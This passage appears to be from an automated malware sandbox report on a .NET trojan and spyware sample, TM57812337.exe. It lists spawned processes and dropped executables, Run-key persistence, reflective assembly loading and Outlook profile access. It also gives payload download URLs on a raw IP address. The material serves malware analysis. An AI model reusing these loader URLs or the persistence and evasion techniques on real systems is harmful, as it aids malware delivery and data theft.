                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_060CBC90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_060CC9F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_060C1FF8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_060C8828
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_060C0040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_06707FC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_067058D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_0670F510
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_0670B6F7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_06709FA8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_0670B7A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_06705780
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_06707028
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_0670D0B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_0670F4AC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_068516B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_0685A8C8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_0685CC7D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_06854158
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_068564E8
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeCode function: 15_2_056C8CF0
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeCode function: 15_2_056C6E08
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeCode function: 15_2_056B0578
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeCode function: 16_2_028CB338
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeCode function: 16_2_028CA0F8
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeCode function: 16_2_028C6B6F
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeCode function: 16_2_028CD848
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeCode function: 16_2_028C9960
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeCode function: 16_2_028CB5F0
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeCode function: 16_2_028C6EB0
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeCode function: 16_2_028C7C68
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeCode function: 16_2_05000578
                Source: C:\Users\user\AppData\Roaming\excel\excel.exeCode function: 20_2_00BE20B0
                Source: C:\Users\user\AppData\Roaming\excel\excel.exeCode function: 20_2_02CB07C8
                Source: C:\Users\user\AppData\Roaming\excel\excel.exeCode function: 29_2_00F720B0
                Source: C:\Users\user\AppData\Roaming\excel\excel.exeCode function: 29_2_030407C8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: String function: 060C5A58 appears 54 times
                Source: TM57812337.exeBinary or memory string: OriginalFilename vs TM57812337.exe
                Source: TM57812337.exe, 00000000.00000002.360544284.00000000052C0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameZeiiwrk.dll" vs TM57812337.exe
                Source: TM57812337.exe, 00000000.00000003.306396686.000000000362E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameZeiiwrk.dll" vs TM57812337.exe
                Source: TM57812337.exe, 00000000.00000002.360116472.00000000025C7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameVyByKKDDVpahvPjSStHl.exe4 vs TM57812337.exe
                Source: TM57812337.exe, 00000000.00000002.360421539.0000000003637000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameVyByKKDDVpahvPjSStHl.exe4 vs TM57812337.exe
                Source: TM57812337.exe, 00000000.00000003.306551945.0000000003768000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameZeiiwrk.dll" vs TM57812337.exe
                Source: TM57812337.exe, 00000000.00000003.306551945.0000000003768000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs TM57812337.exe
                Source: TM57812337.exe, 00000000.00000002.360171789.0000000002626000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs TM57812337.exe
                Source: TM57812337.exe, 00000000.00000002.360648137.0000000005390000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs TM57812337.exe
                Source: TM57812337.exe, 00000000.00000003.307114547.000000000383B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs TM57812337.exe
                Source: TM57812337.exe, 00000000.00000002.360358801.00000000035A8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameVyByKKDDVpahvPjSStHl.exe4 vs TM57812337.exe
                Source: TM57812337.exeVirustotal: Detection: 39%
                Source: TM57812337.exeReversingLabs: Detection: 26%
                Source: C:\Users\user\Desktop\TM57812337.exeFile read: C:\Users\user\Desktop\TM57812337.exeJump to behavior
                Source: TM57812337.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\TM57812337.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: unknownProcess created: C:\Users\user\Desktop\TM57812337.exe "C:\Users\user\Desktop\TM57812337.exe"
                Source: C:\Users\user\Desktop\TM57812337.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 10
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 10
                Source: C:\Users\user\Desktop\TM57812337.exeProcess created: C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exe "C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exe"
                Source: C:\Users\user\Desktop\TM57812337.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                Source: unknownProcess created: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exe "C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exe "C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exe"
                Source: C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 10
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 10
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\excel\excel.exe "C:\Users\user\AppData\Roaming\excel\excel.exe"
                Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 10
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 10
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 10
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\excel\excel.exe "C:\Users\user\AppData\Roaming\excel\excel.exe"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 10
                Source: C:\Users\user\AppData\Roaming\excel\excel.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Njueisg\Qylfpmj.exe "C:\Users\user\AppData\Roaming\Njueisg\Qylfpmj.exe"
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Njueisg\Qylfpmj.exe "C:\Users\user\AppData\Roaming\Njueisg\Qylfpmj.exe"
                Source: C:\Users\user\Desktop\TM57812337.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 10
                Source: C:\Users\user\Desktop\TM57812337.exeProcess created: C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exe "C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exe"
                Source: C:\Users\user\Desktop\TM57812337.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 10
                Source: C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 10
                Source: C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 10
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 10
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 10
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 10
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 10
                Source: C:\Users\user\Desktop\TM57812337.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\Desktop\TM57812337.exeFile created: C:\Users\user\AppData\Local\UjxomvdvJump to behavior
                Source: C:\Users\user\Desktop\TM57812337.exeFile created: C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exeJump to behavior
                Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@39/12@0/2
                Source: C:\Users\user\Desktop\TM57812337.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: TM57812337.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\TM57812337.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\user\AppData\Roaming\excel\excel.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\user\AppData\Roaming\excel\excel.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6964:120:WilError_01
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2600:120:WilError_01
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3636:120:WilError_01
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{48177aef-c702-4098-984e-f8426dcfd171}
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3148:120:WilError_01
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5680:120:WilError_01
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6884:120:WilError_01
                Source: TM57812337.exeString found in binary or memory: http://3.124.188.36/bay/loader/uploads/TM57812337_Nbfpwrzt.bmp
                Source: Qqsucntzxgqwkiqkvrafiufflip.exeString found in binary or memory: http://3.124.188.36/bay/loader/uploads/flip_Jozgxzue.jpg
                Source: Qjarsxlh.exeString found in binary or memory: http://3.124.188.36/bay/loader/uploads/TM57812337_Nbfpwrzt.bmp
                Source: Qjarsxlh.exeString found in binary or memory: http://3.124.188.36/bay/loader/uploads/TM57812337_Nbfpwrzt.bmp
                Source: 14.2.InstallUtil.exe.400000.0.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                Source: 14.2.InstallUtil.exe.400000.0.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                Source: 14.0.InstallUtil.exe.400000.1.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                Source: 14.0.InstallUtil.exe.400000.1.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                Source: 14.0.InstallUtil.exe.400000.4.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                Source: 14.0.InstallUtil.exe.400000.4.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\TM57812337.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: TM57812337.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: TM57812337.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                Source: Binary string: InstallUtil.pdb\rvr hr_CorExeMainmscoree.dll source: excel.exe, 00000014.00000002.437038810.0000000000BE2000.00000002.00000001.01000000.0000000A.sdmp, excel.exe, 0000001D.00000002.456120032.0000000000F72000.00000002.00000001.01000000.0000000A.sdmp
                Source: Binary string: protobuf-net.pdbSHA256 source: TM57812337.exe, 00000000.00000003.306551945.0000000003768000.00000004.00000800.00020000.00000000.sdmp, TM57812337.exe, 00000000.00000002.360171789.0000000002626000.00000004.00000800.00020000.00000000.sdmp, TM57812337.exe, 00000000.00000002.360648137.0000000005390000.00000004.08000000.00040000.00000000.sdmp, TM57812337.exe, 00000000.00000003.307114547.000000000383B000.00000004.00000800.00020000.00000000.sdmp, Qqsucntzxgqwkiqkvrafiufflip.exe, 0000000C.00000002.475823039.0000000002E5E000.00000004.00000800.00020000.00000000.sdmp, Qqsucntzxgqwkiqkvrafiufflip.exe, 0000000C.00000003.469133000.0000000003FB0000.00000004.00000800.00020000.00000000.sdmp, Qqsucntzxgqwkiqkvrafiufflip.exe, 0000000C.00000002.477264623.0000000005DB0000.00000004.08000000.00040000.00000000.sdmp, Qjarsxlh.exe, 0000000F.00000003.428208738.0000000004548000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 0000000F.00000003.429886945.000000000461B000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 0000000F.00000002.489936529.0000000003406000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 0000000F.00000002.491299133.0000000006290000.00000004.08000000.00040000.00000000.sdmp, Qjarsxlh.exe, 00000010.00000002.507900582.0000000002B76000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 00000010.00000003.440435154.0000000003CB8000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 00000010.00000003.441550036.0000000003D8B000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 00000010.00000002.508571401.0000000005AC0000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: protobuf-net.pdb source: TM57812337.exe, 00000000.00000003.306551945.0000000003768000.00000004.00000800.00020000.00000000.sdmp, TM57812337.exe, 00000000.00000002.360171789.0000000002626000.00000004.00000800.00020000.00000000.sdmp, TM57812337.exe, 00000000.00000002.360648137.0000000005390000.00000004.08000000.00040000.00000000.sdmp, TM57812337.exe, 00000000.00000003.307114547.000000000383B000.00000004.00000800.00020000.00000000.sdmp, Qqsucntzxgqwkiqkvrafiufflip.exe, 0000000C.00000002.475823039.0000000002E5E000.00000004.00000800.00020000.00000000.sdmp, Qqsucntzxgqwkiqkvrafiufflip.exe, 0000000C.00000003.469133000.0000000003FB0000.00000004.00000800.00020000.00000000.sdmp, Qqsucntzxgqwkiqkvrafiufflip.exe, 0000000C.00000002.477264623.0000000005DB0000.00000004.08000000.00040000.00000000.sdmp, Qjarsxlh.exe, 0000000F.00000003.428208738.0000000004548000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 0000000F.00000003.429886945.000000000461B000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 0000000F.00000002.489936529.0000000003406000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 0000000F.00000002.491299133.0000000006290000.00000004.08000000.00040000.00000000.sdmp, Qjarsxlh.exe, 00000010.00000002.507900582.0000000002B76000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 00000010.00000003.440435154.0000000003CB8000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 00000010.00000003.441550036.0000000003D8B000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 00000010.00000002.508571401.0000000005AC0000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: InstallUtil.pdb source: excel.exe, excel.exe, 0000001D.00000002.456120032.0000000000F72000.00000002.00000001.01000000.0000000A.sdmp, InstallUtil.exe, 00000021.00000002.535075239.0000000006380000.00000004.00000800.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                Source: TM57812337.exe, nbjjg.cs.Net Code: gpcje System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                Source: Qjarsxlh.exe.0.dr, nbjjg.cs.Net Code: gpcje System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                Source: Qqsucntzxgqwkiqkvrafiufflip.exe.0.dr, tnyy.cs.Net Code: pqsj System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                Source: 0.0.TM57812337.exe.110000.0.unpack, nbjjg.cs.Net Code: gpcje System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                Source: 0.2.TM57812337.exe.110000.0.unpack, nbjjg.cs.Net Code: gpcje System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                Source: Qylfpmj.exe.12.dr, tnyy.cs.Net Code: pqsj System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                Source: 12.0.Qqsucntzxgqwkiqkvrafiufflip.exe.b20000.3.unpack, tnyy.cs.Net Code: pqsj System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                Source: 12.0.Qqsucntzxgqwkiqkvrafiufflip.exe.b20000.0.unpack, tnyy.cs.Net Code: pqsj System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                Source: 12.2.Qqsucntzxgqwkiqkvrafiufflip.exe.b20000.0.unpack, tnyy.cs.Net Code: pqsj System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                Source: 12.0.Qqsucntzxgqwkiqkvrafiufflip.exe.b20000.2.unpack, tnyy.cs.Net Code: pqsj System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                Source: 12.0.Qqsucntzxgqwkiqkvrafiufflip.exe.b20000.1.unpack, tnyy.cs.Net Code: pqsj System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                Source: C:\Users\user\Desktop\TM57812337.exeCode function: 0_2_0231CAAE push FFFFFF8Bh; iretd
                Source: C:\Users\user\Desktop\TM57812337.exeCode function: 0_2_023119C1 push edi; ret
                Source: C:\Users\user\Desktop\TM57812337.exeCode function: 0_2_0231BE13 push FFFFFF8Bh; iretd
                Source: C:\Users\user\Desktop\TM57812337.exeCode function: 0_2_0231BF3B push FFFFFF8Bh; iretd
                Source: C:\Users\user\Desktop\TM57812337.exeCode function: 0_2_0231BDFF push FFFFFF8Bh; ret
                Source: C:\Users\user\Desktop\TM57812337.exeCode function: 0_2_0231BDC6 push FFFFFF8Bh; ret
                Source: C:\Users\user\Desktop\TM57812337.exeCode function: 0_2_0540C049 push edi; ret
                Source: C:\Users\user\Desktop\TM57812337.exeCode function: 0_2_0540BAB1 push edi; ret
                Source: C:\Users\user\Desktop\TM57812337.exeCode function: 0_2_05472551 push edi; ret
                Source: C:\Users\user\Desktop\TM57812337.exeCode function: 0_2_05472246 push edi; ret
                Source: C:\Users\user\Desktop\TM57812337.exeCode function: 0_2_05470066 push edi; ret
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_060CEBFF push esp; ret
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_0670C443 push edx; retf
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_067018F7 push es; ret
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_067018AB push es; ret
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_06702177 push edi; retn 0000h
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeCode function: 15_2_062E0006 push es; retf
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeCode function: 16_2_028CCAAE push FFFFFF8Bh; iretd
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeCode function: 16_2_028CBE13 push FFFFFF8Bh; iretd
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeCode function: 16_2_028CBDC6 push FFFFFF8Bh; ret
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeCode function: 16_2_028CBDFF push FFFFFF8Bh; ret
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\excel\excel.exeJump to dropped file
                Source: C:\Users\user\Desktop\TM57812337.exeFile created: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeJump to dropped file
                Source: C:\Users\user\Desktop\TM57812337.exeFile created: C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exeFile created: C:\Users\user\AppData\Roaming\Njueisg\Qylfpmj.exeJump to dropped file

                Boot Survival

                barindex
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run excelJump to behavior
                Source: C:\Users\user\Desktop\TM57812337.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run QjarsxlhJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run QylfpmjJump to behavior
                Source: C:\Users\user\Desktop\TM57812337.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run QjarsxlhJump to behavior
                Source: C:\Users\user\Desktop\TM57812337.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run QjarsxlhJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run QylfpmjJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run QylfpmjJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run excelJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run excelJump to behavior

                Hooking and other Techniques for Hiding and Protection

                barindex
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\excel\excel.exe:Zone.Identifier read attributes | delete
